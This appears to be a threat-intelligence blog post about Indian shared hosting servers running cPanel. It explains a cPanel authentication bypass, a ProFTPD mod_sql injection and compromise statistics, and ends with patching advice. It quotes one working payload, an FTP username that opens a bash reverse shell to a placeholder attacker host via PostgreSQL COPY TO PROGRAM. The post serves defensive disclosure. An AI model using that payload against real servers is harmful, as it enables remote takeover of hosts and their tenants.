500 Websites on One Box: India's Shared Hosting Attack Surface .
India's shared hosting market runs almost entirely on cPanel, and the entire stack lives on one box. In the last 30 days, cPanel's authentication was bypassed as a zero-day for two months (CVE-2026-41940), ProFTPD's SQL escaping logic was defeated with dollar-quoted payloads (CVE-2026-42167), and 2,100 Indian servers were confirmed compromised. We mapped the compound attack surface, the CERT-In advisory gap, and what the EIG/Newfold consolidation means for three of India's largest hosting brands sharing one patching decision.
Published
May 14, 2026
Category
Threat Intelligence
Author
Krishna Agarwal
A typical Indian shared hosting server runs cPanel, Apache, MySQL, Exim, Dovecot, Roundcube, BIND, and an FTP daemon — all on a single machine. Between 200 and 1,000 customer accounts share that machine, isolated from each other by Unix permissions and, if the provider bothered, CloudLinux's CageFS. There are no containers, no VMs between tenants, no microservices decomposition. When one service falls, everything behind it is exposed.
In the last 30 days, two of those services fell hard.
The Stack
Before we get to the vulnerabilities, it's worth looking at what actually runs on one of these servers. This is the standard cPanel shared hosting deployment, the kind that powers the majority of India's web presence.
Typical Indian Shared Hosting Server
/cPanel/WHM (ports 2083, 2087, 2095, 2096)/
/cpsrvd — single binary handles all panel traffic/
That's at least 18 externally reachable ports serving 6 distinct services through one kernel. Every one of those services has had critical vulnerabilities in the past 12 months. Two of them, cPanel's cpsrvd daemon and ProFTPD's mod_sql module were hit within days of each other in late April 2026.
The First Crack, cPanel's Two-Month Zero-Day
CVE-2026-41940 is a pre-authentication bypass in cPanel & WHM's session handling (CVSS 9.8). The full technical breakdown has been
500 Websites on One Box: India's Shared Hosting Attack Surface | Blog | Principle Breach | Principle Breach
covered by watchTowr
, we won't repeat their analysis. What matters for this piece is what the vulnerability means for the hosting stack.
The attack injects CRLF characters into a session file via a malformed Authorization: Basic header, writing arbitrary key-value pairs, including user=root and tfa_verified=1 , into the session before the sanitization code runs. The result: unauthenticated root access to WHM.
Root WHM access on a shared hosting server means access to everything. Every customer's files, every database, every email account, every DNS record. The attacker can read /root/.my.cnf for MySQL root credentials, plant SSH keys, deploy webshells, modify any service configuration on the box. On a server with 500 accounts, that's 500 websites compromised through a single HTTP request to port 2087.
cPanel controls approximately 94% of the commercial hosting control panel market. About 1.5 million instances are internet-facing. The vulnerability was exploited as a zero-day starting around February 23, 2026, two full months before the patch shipped on April 28.
CVE-2026-41940, The cPanel Crisis
2026-02-23
Zero-Day Exploitation Begins
Threat actors begin exploiting CVE-2026-41940 in the wild. No patch exists.
2026-04-28
Patch Released
cPanel ships emergency TSR with fix. Advisory published.
2026-04-30
44,000+ Servers Compromised
Shadowserver and CybelAngel report mass compromise, ~2,100 of those in India
2026-05-04
Ransomware Deployed
"Sorry" ransomware (Go-based Linux encryptor) found on 7,135 cPanel hosts via Censys
Nine days before the cPanel patch, on April 28, a separate vulnerability was published in ProFTPD. CVE-2026-42167 is a pre-authentication SQL injection in mod_sql affecting every ProFTPD release before 1.3.9a, the entire 1.3.x line (CVSS 8.1).
The bug is in a function called is_escaped_text(), and it's the kind of logic flaw that looks harmless until you see the exploit.
C
123456789101112131415
static int is_escaped_text(const char *text, size_t text_len) {
register unsigned int i;
if (text[0] != '\'') {
return FALSE;
}
if (text[text_len-1] != '\'') {
return FALSE;
}
for (i = 1; i < text_len-1; i++) {
if (text[i] == '\'') {
return FALSE;
}
}
return TRUE;
}
The function checks whether a string is "already escaped" by looking at three things: does it start with a single quote, does it end with one, and are there any single quotes in between? If all three conditions pass, mod_sql skips escaping entirely and drops the value straight into the SQL statement.
The problem is that an attacker controls the FTP username. The USER command is processed before authentication, it's pre-auth by definition. When ProFTPD logs that username via SQLLog directives (a common configuration, and one ProFTPD's own documentation recommends), the %U format variable gets resolved and checked by is_escaped_text().
A username like this passes the check:
Plain Text
1
', null, null); COPY (SELECT $$x$$) TO PROGRAM $$bash -c "bash -i >& /dev/tcp/ATTACKER/9998 0>&1"$$; --'
It starts with ', ends with ', and contains zero internal single quotes. The injected SQL uses PostgreSQL's dollar-quoting ($$...$$) instead of quotes for its string literals. The function sees a "properly escaped" value and waves it through. The attacker's stacked query executes, and on a PostgreSQL backend with superuser privileges, COPY TO PROGRAM gives them a shell.
Backend Matters
The full RCE chain requires PostgreSQL with superuser database privileges. MySQL's default client library does not support stacked queries, which blocks the most dangerous exploitation paths. However, blind SQL injection (data exfiltration via timing side-channels) and backdoor user injection work on all backends that support stacked queries, including SQLite.
ProFTPD ships bundled with cPanel, Plesk, DirectAdmin, and ISPConfig. On cPanel specifically, the default FTP daemon switched to Pure-FTPd around 2014, so most current cPanel installations aren't running ProFTPD — but legacy servers, servers where the admin explicitly chose ProFTPD, and servers running DirectAdmin or ISPConfig are all in scope. Shodan counts 162,329 public ProFTPD instances globally.
The Compound Problem
Either vulnerability alone is severe. Together, on the same server, they're worse than the sum of their parts.
The direct path: CVE-2026-41940 gives root WHM access on any cPanel server. An attacker with WHM root can reconfigure the FTP daemon, switch from Pure-FTPd to ProFTPD, enable mod_sql, add logging directives with %U, and plant backdoor FTP accounts in the database. This creates a persistence mechanism that survives cPanel patching, because the FTP backdoor lives in a separate service and database that the cPanel security update doesn't touch.
The reverse path: On servers already running ProFTPD with mod_sql, CVE-2026-42167 gives database access or limited RCE as the ProFTPD/database user. From there, CVE-2026-41940 on ports 2083/2087 escalates to full root WHM, compromising every tenant.
But the compound problem isn't really about chaining these two CVEs. It's about the architecture.
Rendering diagram…
Attack surface of a typical Indian shared hosting server
Every externally reachable service on that server has had a critical or high-severity vulnerability disclosed in the past 12 months. Exim shipped four CVEs in April 2026 alone (CVE-2026-40684 through 40687, crash via DNS PTR, heap corruption, OOB read). Roundcube had a CVSS 9.9 post-auth RCE via PHP object deserialization (CVE-2025-49113), weaponized within 48 hours and added to the CISA KEV catalog. cPanel itself shipped three additional CVEs (29201, 29202, 29203) on May 8, just ten days after the authentication bypass patch.
This is what a monolithic deployment looks like when the vulnerability rate exceeds the patching rate.
2,100 Indian Servers
India is the second-largest geographic market for cPanel, with roughly 16-17% of cPanel's global customer base. When CVE-2026-41940 hit, the Shadowserver Foundation's geographic breakdown showed 2,100 likely-compromised cPanel instances in India, servers that were not only exploited but actively being used as attack infrastructure, scanning and brute-forcing other targets.
That 2,100 is a floor. It only counts servers that Shadowserver's honeypots observed attacking outward. The number of compromised-but-quiet Indian servers, the ones used for data theft, ransomware staging, or credential harvesting without generating observable scanning traffic — is certainly higher.
CVE-2026-41940, Compromised cPanel Instances by Country (Shadowserver, April 30)
United States15200 (50%)
France4300 (14%)
Germany4200 (14%)
United Kingdom2300 (8%)
India2100 (7%)
Canada2100 (7%)
CERT-In — India's national Computer Emergency Response Team, appears to have issued no specific advisory for CVE-2026-41940. We searched the CERT-In advisory database and found no guidance about the cPanel authentication bypass, despite 2,100+ Indian instances being confirmed compromised. The most recent CERT-In advisory at the time of the cPanel crisis covered Intel processor vulnerabilities (CIAD-2026-0013, March 12). For a vulnerability affecting India's web hosting infrastructure at this scale, the silence is notable.
The Consolidation Problem
India's hosting market has a concentration risk that amplifies infrastructure-class vulnerabilities.
Endurance International Group — now Newfold Digital, owns BigRock, HostGator India, Bluehost India, and ResellerClub. In July 2025, both HostGator India and Bluehost India were migrated onto BigRock's server infrastructure. What customers perceive as three competing hosting brands is, at the infrastructure level, one fleet of servers managed by one operations team making one patching decision.
If BigRock is slow to patch, three brands are simultaneously vulnerable. If BigRock's infrastructure is breached, three brands' customers are simultaneously exposed. The consolidation that made economic sense for Newfold Digital created a single point of failure for a significant portion of India's shared hosting market.
We don't know BigRock's specific patching timeline for CVE-2026-41940. But the Shadowserver data shows that 48 hours after the patch was available, thousands of Indian cPanel instances were still compromised, and some of those almost certainly belong to the EIG/Newfold portfolio.
What This Means
The Indian shared hosting market runs primarily on cPanel. cPanel runs everything on one box. That box exposes half a dozen services to the internet, each with its own vulnerability history, and isolates tenants from each other using filesystem permissions and, if the provider pays for CloudLinux, lightweight process containers. There's no defense in depth between a compromised control panel and a customer's WordPress database.
The cPanel authentication bypass alone was bad enough: pre-auth, unauthenticated, root access, exploited as a zero-day for two months. Combined with ProFTPD's SQL injection, Exim's memory corruption bugs, and Roundcube's deserialization RCE, the picture for anyone relying on Indian shared hosting is grim.
If you operate an Indian hosting provider:
Verify you're running cPanel 136.0.5 or later (patches CVE-2026-41940 and the May 8 CVEs)
If running ProFTPD, upgrade to 1.3.9a or switch to Pure-FTPd
Audit your Exim version — 4.99.2 fixes the April 2026 memory safety issues
Check Roundcube — CVE-2025-49113 is in the CISA KEV catalog
Consider whether `ServerTokens Prod` is actually helping or just hiding your version from your own security audits
Review your cPanel update tier — EDGE and CURRENT get patches faster than RELEASE
If you're hosted on Indian shared hosting:
You cannot control the patching timeline. Your hosting provider decides when your server gets patched.
A root-level compromise of your server exposes every tenant, not just the one that was targeted. Your site can be collateral damage.
If your hosting provider runs BigRock, HostGator India, or Bluehost India infrastructure, understand that these are the same servers managed by the same team.
CVE-2026-41940 was discovered and analyzed by watchTowr Labs. CVE-2026-42167 was discovered by ZeroPath (LeftenantZero). Shadowserver Foundation provided the geographic compromise data. Shodan and CybelAngel provided exposure statistics.